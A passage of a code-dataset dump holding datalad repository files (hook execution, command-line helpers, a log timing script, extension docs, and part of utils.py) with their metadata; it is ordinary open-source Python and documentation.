\"{dsarg}\", \"path\": \"{path}\"}}\n\n Parameters\n ----------\n hook : str\n Name of the hook\n spec : dict\n Hook definition as returned by `get_hooks_from_config()`\n res : dict\n Result records that were found to match the hook definition.\n dsarg : Dataset or str or None, optional\n Value to substitute a {dsarg} placeholder in a hook 'call' specification\n with. 
Non-string values are automatically converted.\n\n Yields\n ------\n dict\n Any result yielded by the command executed as hook.\n \"\"\"\n import datalad.api as dl\n cmd_name = spec['cmd']\n if not hasattr(dl, cmd_name):\n # TODO maybe a proper error result?\n lgr.warning(\n 'Hook %s requires unknown command %s, skipped',\n hook, cmd_name)\n return\n cmd = getattr(dl, cmd_name)\n # apply potential substitutions on the string form of the args\n # for this particular result\n # take care of proper JSON encoding for each value\n enc = json.JSONEncoder().encode\n # we have to ensure JSON encoding of all values (some might be Path instances),\n # we are taking off the outer quoting, to enable flexible combination\n # of individual items in supplied command and argument templates\n args = spec['args'].format(\n # we cannot use a dataset instance directly but must take the\n # detour over the path location in order to have string substitution\n # be possible\n dsarg='' if dsarg is None else enc(dsarg.path).strip('\"')\n if isinstance(dsarg, dl.Dataset) else enc(dsarg).strip('\"'),\n # skip any present logger that we only carry for internal purposes\n **{k: enc(str(v)).strip('\"') for k, v in res.items() if k != 'logger'})\n # now load\n try:\n args = json.loads(args)\n except Exception as e:\n ce = CapturedException(e)\n lgr.warning(\n 'Invalid argument specification for hook %s '\n '(after parameter substitutions): %s [%s], '\n 'hook will be skipped',\n hook, args, ce)\n return\n # only debug level, the hook can issue its own results and communicate\n # through them\n lgr.debug('Running hook %s: %s%s', hook, cmd_name, args)\n for r in cmd(**args):\n yield r\n" }, { "alpha_fraction": 0.6001886129379272, "alphanum_fraction": 0.605374813079834, "avg_line_length": 31.136363983154297, "blob_id": "c02a7f55376863700d46de8b2f7bb1a4b156177c", "content_id": "180e293db425274ae3dad4ed6fc7de13f83a6f19", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2121, "license_type": "permissive", "max_line_length": 87, "num_lines": 66, "path": "/datalad/cmdline/helpers.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport os\nimport warnings\n\nfrom logging import getLogger\nlgr = getLogger('datalad.cmdline')\n\n\ndef get_repo_instance(path=os.curdir, class_=None):\n \"\"\"Returns an instance of appropriate datalad repository for path.\n Check whether a certain path is inside a known type of repository and\n returns an instance representing it. May also check for a certain type\n instead of detecting the type of repository.\n\n .. deprecated:: 0.16\n Use the pattern `Dataset(get_dataset_root(path)).repo` instead. 
This\n function will be removed in a future release.\n\n Parameters\n ----------\n path: str\n path to check; default: current working directory\n class_: class\n if given, check whether path is inside a repository, that can be\n represented as an instance of the passed class.\n\n Raises\n ------\n RuntimeError, in case cwd is not inside a known repository.\n \"\"\"\n warnings.warn(\"get_repo_instance() was deprecated in 0.16. \"\n \"It will be removed in a future release.\",\n DeprecationWarning)\n\n from datalad.utils import get_dataset_root\n from datalad.distribution.dataset import Dataset\n from datalad.support.annexrepo import AnnexRepo\n from datalad.support.gitrepo import GitRepo\n\n if class_ is not None:\n if class_ == AnnexRepo:\n type_ = \"annex\"\n elif class_ == GitRepo:\n type_ = \"git\"\n else:\n raise RuntimeError(\"Unknown class %s.\" % str(class_))\n else:\n type_ = ''\n\n dsroot = get_dataset_root(path)\n if not dsroot:\n raise RuntimeError(f\"No {type_}s repository found at {path}.\")\n\n return Dataset(dsroot).repo\n" }, { "alpha_fraction": 0.53515625, "alphanum_fraction": 0.5559895634651184, "avg_line_length": 25.947368621826172, "blob_id": "5caffa6956c8c07d323d6aef72b934a90b00a785", "content_id": "206df023413dcc3ca4543b7f35d4a74135eed0a9", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1536, "license_type": "permissive", "max_line_length": 95, "num_lines": 57, "path": "/tools/dtime", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n#emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n#ex: set sts=4 ts=4 sw=4 noet:\n\"\"\"Little helper to annotate logfile with difference between timestamps in consecutive lines\n\nIt prints time estimated from previous line on the previous line, with 0 always printed as well\nso it becomes possible to sort -n the output to see from what line it took longest to the next\n\"\"\"\n\nimport sys\nimport re\nfrom datetime import datetime\n\nreg = re.compile('^\\d{4}-\\d{2}-\\d{1,2} \\d{1,2}:\\d{1,2}:\\d{1,2},\\d{1,3}')\nprevt = None\nmaxl = 0\nprevl = None\n\nif len(sys.argv) <= 1:\n in_ = sys.stdin\nelse:\n in_ = open(sys.argv[1])\n\ntrailer = []\nfor l in in_:\n res = reg.search(l)\n dtstr = ''\n if res:\n end = res.end()\n t = datetime.strptime(l[:end], '%Y-%m-%d %H:%M:%S,%f')\n if prevt is not None:\n dt = t - prevt\n ms = dt.microseconds // 1000 + dt.seconds*1000\n dtstr = (\"%5d\" % ms if ms else ' 0')\n\n maxl = max(maxl, len(dtstr))\n dtstr = '%%%ds' % maxl % dtstr\n prevl = \"%s %s\" % (dtstr, prevl)\n prevt = t\n else:\n # no timestamp -- add to the trailer\n trailer.append(l)\n continue\n\n if prevl is not None:\n for l_ in trailer:\n sys.stdout.write(\" - \" + l_)\n trailer = []\n sys.stdout.write(prevl)\n\n if res:\n prevl = l\n\nif prevl:\n sys.stdout.write(\"----- \" + prevl)\nfor l_ in trailer:\n sys.stdout.write(\" - \" + l_)\n" }, { "alpha_fraction": 0.7659003734588623, "alphanum_fraction": 0.7678160667419434, "avg_line_length": 44.78947448730469, "blob_id": "fc573835727e2af922fcc3dc78b05c939b8330e5", "content_id": "88620655adfba20e2af82a6a2feb828610172f27", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2610, "license_type": "permissive", "max_line_length": 101, "num_lines": 57, "path": "/docs/source/customization.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", 
"text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_customization:\n\n********************************************\nCustomization and extension of functionality\n********************************************\n\nDataLad provides numerous commands that cover many use cases. However, there\nwill always be a demand for further customization or extensions of built-in\nfunctionality at a particular site, or for an individual user. DataLad\naddresses this need with a mechanism for extending particular DataLad\nfunctionality, such as metadata extractor, or providing entire command suites\nfor a specialized purpose.\n\nAs the name suggests, a :term:`DataLad extension` package is a proper Python package.\nConsequently, there is a significant amount of boilerplate code involved in the\ncreation of a new DataLad extension. However, this overhead enables a number of\nuseful features for extension developers:\n\n- extensions can provide any number of additional commands that can be grouped into\n labeled command suites, and are automatically exposed via the standard DataLad commandline\n and Python API\n- extensions can define `entry_points` for any number of additional metadata extractors\n that become automatically available to DataLad\n- extensions can define `entry_points` for their test suites, such that the standard `datalad create`\n command will automatically run these tests in addition to the tests shipped with DataLad core\n- extensions can ship additional dataset procedures by installing them into a\n directory ``resources/procedures`` underneath the extension module directory\n\n\nUsing an extension\n==================\n\nA :term:`DataLad extension` is a standard Python package. Beyond installation of the package there is\nno additional setup required.\n\n\nWriting your own extensions\n===========================\n\nA good starting point for implementing a new extension is the \"helloworld\" demo extension\navailable at https://github.com/datalad/datalad-extension-template. This repository can be cloned\nand adjusted to suit one's needs. 
It includes:\n\n- a basic Python package setup\n- simple demo command implementation\n- Travis test setup\n\nA more complex extension setup can be seen in the DataLad Neuroimaging\nextension: https://github.com/datalad/datalad-neuroimaging, including additional metadata extractors,\ntest suite registration, and a sphinx-based documentation setup for a DataLad extension.\n\nAs a DataLad extension is a standard Python package, an extension should declare\ndependencies on an appropriate DataLad version, and possibly other extensions\nvia the standard mechanisms.\n" }, { "alpha_fraction": 0.6034966111183167, "alphanum_fraction": 0.6084591150283813, "avg_line_length": 32.856590270996094, "blob_id": "4bd14d9331ffde880c4608d7ab608342396595c7", "content_id": "5e211351ab9193be24dbf7a2b2ccf84c8c8768f6", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 96322, "license_type": "permissive", "max_line_length": 176, "num_lines": 2845, "path": "/datalad/utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nfrom __future__ import annotations\n\nimport builtins\nimport collections\nimport gc\nimport glob\nimport gzip\nimport inspect\nimport logging\nimport os\nimport os.path as op\nimport platform\nimport posixpath\nimport re\nimport shutil\nimport stat\nimport string\nimport sys\nimport tempfile\nimport threading\nimport time\nimport warnings\nfrom collections.abc import (\n Callable,\n Iterable,\n Iterator,\n Sequence,\n)\nfrom contextlib import contextmanager\nfrom copy import copy as shallow_copy\nfrom functools import (\n lru_cache,\n wraps,\n)\nfrom itertools import tee\n# this import is required because other modules import opj from here.\nfrom os.path import (\n abspath,\n basename,\n commonprefix,\n curdir,\n dirname,\n exists,\n expanduser,\n expandvars,\n isabs,\n isdir,\n islink,\n)\nfrom os.path import join as opj\nfrom os.path import (\n lexists,\n normpath,\n pardir,\n relpath,\n sep,\n split,\n splitdrive,\n)\nfrom pathlib import (\n Path,\n PurePath,\n PurePosixPath,\n)\nfrom shlex import quote as shlex_quote\nfrom shlex import split as shlex_split\nfrom tempfile import NamedTemporaryFile\nfrom time import sleep\nfrom types import (\n ModuleType,\n TracebackType,\n)\nfrom typing import (\n IO,\n Any,\n Dict,\n List,\n NamedTuple,\n Optional,\n TextIO,\n Tuple,\n TypeVar,\n Union,\n cast,\n overload,\n)\n\n# from datalad.dochelpers import get_docstring_split\nfrom datalad.consts import TIMESTAMP_FMT\nfrom datalad.support.exceptions import CapturedException\nfrom datalad.typing import (\n K,\n Literal,\n P,\n T,\n V,\n)\n\n# handle this dance once, and import pathlib from here\n# in all other places\n\nlgr = logging.getLogger(\"datalad.utils\")\n\nlgr.log(5, \"Importing datalad.utils\")\n#\n# Some useful variables\n#\nplatform_system = platform.system().lower()\non_windows = platform_system == 'windows'\non_osx = platform_system == 'darwin'\non_linux = platform_system == 'linux'\n\n# COPY_BUFSIZE sort of belongs into datalad.consts, but that would lead to\n# circular import due to `on_windows`\ntry:\n from 
shutil import COPY_BUFSIZE # type: ignore[attr-defined]\nexcept ImportError: # pragma: no cover\n # too old\n from datalad.utils import on_windows\n\n # from PY3.10\n COPY_BUFSIZE = 1024 * 1024 if on_windows else 64 * 1024\n\n\n# Takes ~200msec, so should not be called at import time\n@lru_cache() # output should not change through life time of datalad process\ndef get_linux_distribution() -> tuple[str, str, str]:\n \"\"\"Compatibility wrapper for {platform,distro}.linux_distribution().\n \"\"\"\n if hasattr(platform, \"linux_distribution\"):\n # Use deprecated (but faster) method if it's available.\n with warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\", category=DeprecationWarning)\n result = platform.linux_distribution()\n else:\n import distro # We require this for Python 3.8 and above.\n return (\n distro.id(),\n distro.version(),\n distro.codename(),\n )\n return result\n\n\n# Those weren't used for any critical decision making, thus we just set them to None\n# Use get_linux_distribution() directly where needed\nlinux_distribution_name = linux_distribution_release = None\n\n# Maximal length of cmdline string\n# Query the system and use hardcoded \"knowledge\" if None\n# probably getconf ARG_MAX might not be available\n# The last one would be the most conservative/Windows\nCMD_MAX_ARG_HARDCODED = 2097152 if on_linux else 262144 if on_osx else 32767\ntry:\n CMD_MAX_ARG = os.sysconf('SC_ARG_MAX')\n assert CMD_MAX_ARG > 0\n if CMD_MAX_ARG > CMD_MAX_ARG_HARDCODED * 1e6:\n # workaround for some kind of a bug which comes up with python 3.4\n # see https://github.com/datalad/datalad/issues/3150\n # or on older CentOS with conda and python as new as 3.9\n # see https://github.com/datalad/datalad/issues/5943\n # TODO: let Yarik know that the world is a paradise now whenever 1e6\n # is not large enough\n CMD_MAX_ARG = min(CMD_MAX_ARG, CMD_MAX_ARG_HARDCODED)\nexcept Exception as exc:\n # ATM (20181005) SC_ARG_MAX available only on POSIX systems\n # so exception would be thrown e.g. on Windows, or\n # somehow during Debian build for nd14.04 it is coming up with -1:\n # https://github.com/datalad/datalad/issues/3015\n CMD_MAX_ARG = CMD_MAX_ARG_HARDCODED\n lgr.debug(\n \"Failed to query or got useless SC_ARG_MAX sysconf, \"\n \"will use hardcoded value: %s\", exc)\n# Even with all careful computations we do, due to necessity to account for\n# environment and what not, we still could not figure out \"exact\" way to\n# estimate it, but it was shown that 300k safety margin on linux was sufficient.\n# https://github.com/datalad/datalad/pull/2977#issuecomment-436264710\n# 300k is ~15%, so to be safe, and for paranoid us we will just use up to 50%\n# of the length for \"safety margin\". We might probably still blow due to\n# env vars, unicode, etc... so any hard limit imho is not a proper solution\nCMD_MAX_ARG = int(0.5 * CMD_MAX_ARG)\nlgr.debug(\n \"Maximal length of cmdline string (adjusted for safety margin): %d\",\n CMD_MAX_ARG)\n\n#\n# Little helpers\n#\n\n# `getargspec` has been deprecated in Python 3.\nclass ArgSpecFake(NamedTuple):\n args: list[str]\n varargs: Optional[str]\n keywords: Optional[str]\n defaults: Optional[tuple[Any, ...]]\n\n\n# adding cache here somehow does break it -- even 'datalad wtf' does not run\n# @lru_cache() # signatures stay the same, why to \"redo\"? 
brings it into ns from mks\ndef getargspec(func: Callable[..., Any], *, include_kwonlyargs: bool=False) -> ArgSpecFake:\n \"\"\"Compat shim for getargspec deprecated in python 3.\n\n The main difference from inspect.getargspec (and inspect.getfullargspec\n for that matter) is that by using inspect.signature we are providing\n correct args/defaults for functools.wraps'ed functions.\n\n `include_kwonlyargs` option was added to centralize getting all args,\n even the ones which are kwonly (follow the ``*,``).\n\n For internal use and not advised for use in 3rd party code.\n Please use inspect.signature directly.\n \"\"\"\n # We use signature, and not getfullargspec, because only signature properly\n # \"passes\" args from a functools.wraps decorated function.\n # Note: getfullargspec works Ok on wrapt-decorated functions\n f_sign = inspect.signature(func)\n # Loop through parameters and compose argspec\n args: list[str] = []\n varargs: Optional[str] = None\n keywords: Optional[str] = None\n defaults: dict[str, Any] = {}\n # Collect all kwonlyargs into a dedicated dict - name: default\n kwonlyargs: dict[str, Any] = {}\n P = inspect.Parameter\n\n for p_name, p in f_sign.parameters.items():\n if p.kind in (P.POSITIONAL_ONLY, P.POSITIONAL_OR_KEYWORD):\n assert not kwonlyargs # yoh: must not come after kwonlyarg\n args.append(p_name)\n if p.default is not P.empty:\n defaults[p_name] = p.default\n elif p.kind == P.VAR_POSITIONAL:\n varargs = p_name\n elif p.kind == P.VAR_KEYWORD:\n keywords = p_name\n elif p.kind == P.KEYWORD_ONLY:\n assert p.default is not P.empty\n kwonlyargs[p_name] = p.default\n\n if kwonlyargs:\n if not include_kwonlyargs:\n raise ValueError(\n 'Function has keyword-only parameters or annotations, either use '\n 'inspect.signature() API which can support them, or provide include_kwonlyargs=True '\n 'to this function'\n )\n else:\n args.extend(list(kwonlyargs))\n defaults.update(kwonlyargs)\n\n # harmonize defaults to how original getargspec returned them -- just a tuple\n d_defaults = None if not defaults else tuple(defaults.values())\n return ArgSpecFake(args, varargs, keywords, d_defaults)\n\n\n# Definitions to be (re)used in the next function\n_SIG_P = inspect.Parameter\n_SIG_KIND_SELECTORS: dict[str, set[int]] = {\n 'pos_only': {_SIG_P.POSITIONAL_ONLY,},\n 'pos_any': {_SIG_P.POSITIONAL_ONLY, _SIG_P.POSITIONAL_OR_KEYWORD},\n 'kw_any': {_SIG_P.POSITIONAL_OR_KEYWORD, _SIG_P.KEYWORD_ONLY},\n 'kw_only': {_SIG_P.KEYWORD_ONLY,},\n}\n_SIG_KIND_SELECTORS['any'] = set().union(*_SIG_KIND_SELECTORS.values())\n\n\n@lru_cache() # signatures stay the same, why to \"redo\"? brings it into ns from mks\ndef get_sig_param_names(f: Callable[..., Any], kinds: tuple[str, ...]) -> tuple[list[str], ...]:\n \"\"\"A helper to selectively return parameters from inspect.signature.\n\n inspect.signature is the ultimate way for introspecting callables. But\n its interface is not so convenient for a quick selection of parameters\n (AKA arguments) of desired type or combinations of such. This helper\n should make it easier to retrieve desired collections of parameters.\n\n Since often it is desired to get information about multiple specific types\n of parameters, `kinds` is a list, so in a single invocation of `signature`\n and looping through the results we can obtain all information.\n\n Parameters\n ----------\n f: callable\n kinds: tuple with values from {'pos_any', 'pos_only', 'kw_any', 'kw_only', 'any'}\n Is a list of what kinds of args to return in result (tuple). 
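(As a purely illustrative, hypothetical sketch: for ``def f(a, *, b=1): ...``, calling ``get_sig_param_names(f, ('pos_any', 'kw_only'))`` would be expected to return ``(['a'], ['b'])``.) 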
Each element\n should be one of: 'any_pos' - positional or keyword which could be used\n positionally. 'kw_only' - keyword only (cannot be used positionally) arguments,\n 'any_kw` - any keyword (could be a positional which could be used as a keyword),\n `any` -- any type from the above.\n\n Returns\n -------\n tuple:\n Each element is a list of parameters (names only) of that \"kind\".\n \"\"\"\n selectors: list[set[int]] = []\n for kind in kinds:\n if kind not in _SIG_KIND_SELECTORS:\n raise ValueError(f\"Unknown 'kind' {kind}. Known are: {', '.join(_SIG_KIND_SELECTORS)}\")\n selectors.append(_SIG_KIND_SELECTORS[kind])\n\n out: list[list[str]] = [[] for _ in kinds]\n for p_name, p in inspect.signature(f).parameters.items():\n for i, selector in enumerate(selectors):\n if p.kind in selector:\n out[i].append(p_name)\n\n return tuple(out)\n\n\ndef any_re_search(regexes: str | list[str], value: str) -> bool:\n \"\"\"Return if any of regexes (list or str) searches successfully for value\"\"\"\n for regex in ensure_tuple_or_list(regexes):\n if re.search(regex, value):\n return True\n return False\n\n\ndef not_supported_on_windows(msg: Optional[str]=None) -> None:\n \"\"\"A little helper to be invoked to consistently fail whenever functionality is\n not supported (yet) on Windows\n \"\"\"\n if on_windows:\n raise NotImplementedError(\"This functionality is not yet implemented for Windows OS\"\n + (\": %s\" % msg if msg else \"\"))\n\n\ndef get_home_envvars(new_home: str | Path) -> dict[str, str]:\n \"\"\"Return dict with env variables to be adjusted for a new HOME\n\n Only variables found in current os.environ are adjusted.\n\n Parameters\n ----------\n new_home: str or Path\n New home path, in native to OS \"schema\"\n \"\"\"\n new_home = str(new_home)\n out = {'HOME': new_home}\n if on_windows:\n # requires special handling, since it has a number of relevant variables\n # and also Python changed its behavior and started to respect USERPROFILE only\n # since python 3.8: https://bugs.python.org/issue36264\n out['USERPROFILE'] = new_home\n out['HOMEDRIVE'], out['HOMEPATH'] = splitdrive(new_home)\n\n return {v: val for v, val in out.items() if v in os.environ}\n\n\ndef _is_stream_tty(stream: Optional[IO]) -> bool:\n try:\n # TODO: check on windows if hasattr check would work correctly and\n # add value:\n return stream is not None and stream.isatty()\n except ValueError as exc:\n # Who knows why it is a ValueError, but let's try to be specific\n # If there is a problem with I/O - non-interactive, otherwise reraise\n if \"I/O\" in str(exc):\n return False\n raise\n\n\ndef is_interactive() -> bool:\n \"\"\"Return True if all in/outs are open and tty.\n\n Note that in a somewhat abnormal case where e.g. 
stdin is explicitly\n closed, and any operation on it would raise a\n `ValueError(\"I/O operation on closed file\")` exception, this function\n would just return False, since the session cannot be used interactively.\n \"\"\"\n return all(_is_stream_tty(s) for s in (sys.stdin, sys.stdout, sys.stderr))\n\n\ndef get_ipython_shell() -> Optional[Any]:\n \"\"\"Detect if running within IPython and returns its `ip` (shell) object\n\n Returns None if not under ipython (no `get_ipython` function)\n \"\"\"\n try:\n return get_ipython() # type: ignore[name-defined]\n except NameError:\n return None\n\n\ndef md5sum(filename: str | Path) -> str:\n \"\"\"Compute an MD5 sum for the given file\n \"\"\"\n from datalad.support.digests import Digester\n return Digester(digests=['md5'])(filename)['md5']\n\n\n_encoded_dirsep = r'\\\\' if on_windows else r'/'\n_VCS_REGEX = r'%s\\.(?:git|gitattributes|svn|bzr|hg)(?:%s|$)' % (\n _encoded_dirsep, _encoded_dirsep)\n_DATALAD_REGEX = r'%s\\.(?:datalad)(?:%s|$)' % (\n _encoded_dirsep, _encoded_dirsep)\n\n\ndef find_files(regex: str, topdir: str | Path = curdir, exclude: Optional[str]=None, exclude_vcs: bool =True, exclude_datalad: bool =False, dirs: bool =False) -> Iterator[str]:\n \"\"\"Generator to find files matching regex\n\n Parameters\n ----------\n regex: string\n exclude: string, optional\n Matches to exclude\n exclude_vcs:\n If True, excludes commonly known VCS subdirectories. If string, used\n as regex to exclude those files (regex: `%r`)\n exclude_datalad:\n If True, excludes files known to be datalad meta-data files (e.g. under\n .datalad/ subdirectory) (regex: `%r`)\n topdir: string, optional\n Directory where to search\n dirs: bool, optional\n Whether to match directories as well as files\n \"\"\"\n for dirpath, dirnames, filenames in os.walk(topdir):\n names = (dirnames + filenames) if dirs else filenames\n # TODO: might want to uniformize on windows to use '/'\n paths = (op.join(dirpath, name) for name in names)\n for path in filter(re.compile(regex).search, paths):\n path = path.rstrip(sep)\n if exclude and re.search(exclude, path):\n continue\n if exclude_vcs and re.search(_VCS_REGEX, path):\n continue\n if exclude_datalad and re.search(_DATALAD_REGEX, path):\n continue\n yield path\nfind_files.__doc__ %= (_VCS_REGEX, _DATALAD_REGEX) # type: ignore[operator]\n\n\ndef expandpath(path: str | Path, force_absolute: bool =True) -> str:\n \"\"\"Expand all variables and user handles in a path.\n\n By default return an absolute path\n \"\"\"\n path = expandvars(expanduser(path))\n if force_absolute:\n path = abspath(path)\n return path\n\n\ndef posix_relpath(path: str | Path, start: Optional[str | Path]=None) -> str:\n \"\"\"Behave like os.path.relpath, but always return POSIX paths...\n\n on any platform.\"\"\"\n # join POSIX style\n return posixpath.join(\n # split and relpath native style\n # python2.7 ntpath implementation of relpath cannot handle start=None\n *split(\n relpath(path, start=start if start is not None else '')))\n\n\ndef is_explicit_path(path: str | Path) -> bool:\n \"\"\"Return whether a path explicitly points to a location\n\n Any absolute path, or relative path starting with either '../' or\n './' is assumed to indicate a location on the filesystem. 
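(Purely illustrative examples, assuming a POSIX system: '/tmp/data', './data' and '../data' would be treated as explicit, while a bare 'data' would not.) 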
Any other\n path format is not considered explicit.\"\"\"\n path = expandpath(path, force_absolute=False)\n return isabs(path) \\\n or path.startswith(os.curdir + os.sep) \\\n or path.startswith(os.pardir + os.sep)\n\n\ndef rotree(path: str | Path, ro: bool =True, chmod_files: bool =True) -> None:\n \"\"\"To make tree read-only or writable\n\n Parameters\n ----------\n path : string\n Path to the tree/directory to chmod\n ro : bool, optional\n Whether to make it R/O (default) or RW\n chmod_files : bool, optional\n Whether to operate also on files (not just directories)\n \"\"\"\n if ro:\n chmod = lambda f: os.chmod(f, os.stat(f).st_mode & ~stat.S_IWRITE)\n else:\n chmod = lambda f: os.chmod(f, os.stat(f).st_mode | stat.S_IWRITE | stat.S_IREAD)\n\n for root, dirs, files in os.walk(path, followlinks=False):\n if chmod_files:\n for f in files:\n fullf = op.join(root, f)\n # might be the \"broken\" symlink which would fail to stat etc\n if exists(fullf):\n chmod(fullf)\n chmod(root)\n\n\ndef rmtree(path: str | Path, chmod_files: bool | Literal[\"auto\"] ='auto', children_only: bool =False, *args: Any, **kwargs: Any) -> None:\n \"\"\"To remove git-annex .git it is needed to make all files and directories writable again first\n\n Parameters\n ----------\n path: Path or str\n Path to remove\n chmod_files : string or bool, optional\n Whether to make files writable also before removal. Usually it is just\n a matter of directories to have write permissions.\n If 'auto' it would chmod files on windows by default\n children_only : bool, optional\n If set, all files and subdirectories would be removed while the path\n itself (must be a directory) would be preserved\n `*args` :\n `**kwargs` :\n Passed into shutil.rmtree call\n \"\"\"\n # Give W permissions back only to directories, no need to bother with files\n if chmod_files == 'auto':\n chmod_files = on_windows\n # TODO: yoh thinks that if we could quickly check our Flyweight for\n # repos if any of them is under the path, and could call .precommit\n # on those to possibly stop batched processes etc, we did not have\n # to do it on case by case\n # Check for open files\n assert_no_open_files(path)\n\n # TODO the whole thing should be reimplemented with pathlib, but for now\n # at least accept Path\n path = str(path)\n\n if children_only:\n if not isdir(path):\n raise ValueError(\"Can remove children only of directories\")\n for p in os.listdir(path):\n rmtree(op.join(path, p))\n return\n if not (islink(path) or not isdir(path)):\n rotree(path, ro=False, chmod_files=chmod_files)\n if on_windows:\n # shutil fails to remove paths that exceed 260 characters on Windows machines\n # that did not enable long path support. 
A workaround to remove long paths\n # anyway is to prepend \\\\?\\ to the path.\n # https://docs.microsoft.com/en-us/windows/win32/fileio/naming-a-file?redirectedfrom=MSDN#win32-file-namespaces\n path = r'\\\\?\\ '.strip() + path\n _rmtree(path, *args, **kwargs)\n else:\n # just remove the symlink\n unlink(path)\n\n\ndef rmdir(path: str | Path, *args: Any, **kwargs: Any) -> None:\n \"\"\"os.rmdir with our optional checking for open files\"\"\"\n assert_no_open_files(path)\n os.rmdir(path)\n\n\ndef get_open_files(path: str | Path, log_open: int = False) -> dict[str, Any]:\n \"\"\"Get open files under a path\n\n Note: This function is very slow on Windows.\n\n Parameters\n ----------\n path : str\n File or directory to check for open files under\n log_open : bool or int\n If set - logger level to use\n\n Returns\n -------\n dict\n path : pid\n\n \"\"\"\n # Original idea: https://stackoverflow.com/a/11115521/1265472\n import psutil\n files = {}\n # since the ones returned by psutil would not be aware of symlinks in the\n # path we should also get realpath for path\n # do absolute() in addition to always get an absolute path\n # even with non-existing paths on windows\n path = str(Path(path).resolve().absolute())\n for proc in psutil.process_iter():\n try:\n open_paths = [p.path for p in proc.open_files()] + [proc.cwd()]\n for p in open_paths:\n # note: could be done more efficiently so we do not\n # renormalize path over and over again etc\n if path_startswith(p, path):\n files[p] = proc\n # Catch a race condition where a process ends\n # before we can examine its files\n except psutil.NoSuchProcess:\n pass\n except psutil.AccessDenied:\n pass\n\n if files and log_open:\n lgr.log(log_open, \"Open files under %s: %s\", path, files)\n return files\n\n\n_assert_no_open_files_cfg = os.environ.get('DATALAD_ASSERT_NO_OPEN_FILES')\nif _assert_no_open_files_cfg:\n def assert_no_open_files(path: str | Path) -> None:\n files = get_open_files(path, log_open=40)\n if _assert_no_open_files_cfg == 'assert':\n assert not files, \"Got following files still open: %s\" % ','.join(files)\n elif files:\n if _assert_no_open_files_cfg == 'pdb':\n import pdb\n pdb.set_trace()\n elif _assert_no_open_files_cfg == 'epdb':\n import epdb # type: ignore[import]\n epdb.serve()\n pass\n # otherwise we would just issue that error message in the log\nelse:\n def assert_no_open_files(path: str | Path) -> None:\n pass\n\n\ndef rmtemp(f: str | Path, *args: Any, **kwargs: Any) -> None:\n \"\"\"Wrapper to centralize removing of temp files so we could keep them around\n\n It will not remove the temporary file/directory if DATALAD_TESTS_TEMP_KEEP\n environment variable is defined\n \"\"\"\n if not os.environ.get('DATALAD_TESTS_TEMP_KEEP'):\n if not os.path.lexists(f):\n lgr.debug(\"Path %s does not exist, so can't be removed\", f)\n return\n lgr.log(5, \"Removing temp file: %s\", f)\n # Can also be a directory\n if isdir(f):\n rmtree(f, *args, **kwargs)\n else:\n unlink(f)\n else:\n lgr.info(\"Keeping temp file: %s\", f)\n\n\n@overload\ndef file_basename(name: str | Path, return_ext: Literal[True]) -> tuple[str, str]:\n ...\n\n@overload\ndef file_basename(name: str | Path, return_ext: Literal[False] = False) -> str:\n ...\n\ndef file_basename(name: str | Path, return_ext: bool =False) -> str | tuple[str, str]:\n \"\"\"\n Strips up to 2 extensions of length up to 4 characters and starting with alpha\n not a digit, so we could get rid of .tar.gz etc\n \"\"\"\n bname = basename(name)\n fbname = re.sub(r'(\\.[a-zA-Z_]\\S{1,4}){0,2}$', 
'', bname)\n if return_ext:\n return fbname, bname[len(fbname) + 1:]\n else:\n return fbname\n\n\n# unused in -core\ndef escape_filename(filename: str) -> str:\n \"\"\"Surround filename in \"\" and escape \" in the filename\n \"\"\"\n filename = filename.replace('\"', r'\\\"').replace('`', r'\\`')\n filename = '\"%s\"' % filename\n return filename\n\n\n# unused in -core\ndef encode_filename(filename: str | bytes) -> bytes:\n \"\"\"Encode unicode filename\n \"\"\"\n if isinstance(filename, str):\n return filename.encode(sys.getfilesystemencoding())\n else:\n return filename\n\n\n# unused in -core\ndef decode_input(s: str | bytes) -> str:\n \"\"\"Given input string/bytes, decode according to stdin codepage (or UTF-8)\n if not defined\n\n If fails -- issue warning and decode allowing for errors\n being replaced\n \"\"\"\n if isinstance(s, str):\n return s\n else:\n encoding = sys.stdin.encoding or 'UTF-8'\n try:\n return s.decode(encoding)\n except UnicodeDecodeError as exc:\n lgr.warning(\n \"Failed to decode input string using %s encoding. \"\n \"Decoding allowing for errors\", encoding)\n return s.decode(encoding, errors='replace')\n\n\n# unused in -core\nif on_windows:\n def lmtime(filepath: str | Path, mtime: int | float) -> None:\n \"\"\"Set mtime for files. On Windows a merely adapter to os.utime\n \"\"\"\n os.utime(filepath, (time.time(), mtime))\nelse:\n def lmtime(filepath: str | Path, mtime: int | float) -> None:\n \"\"\"Set mtime for files, while not de-referencing symlinks.\n\n To overcome absence of os.lutime\n\n Works only on linux and OSX ATM\n \"\"\"\n from .cmd import WitlessRunner\n\n # convert mtime to format touch understands 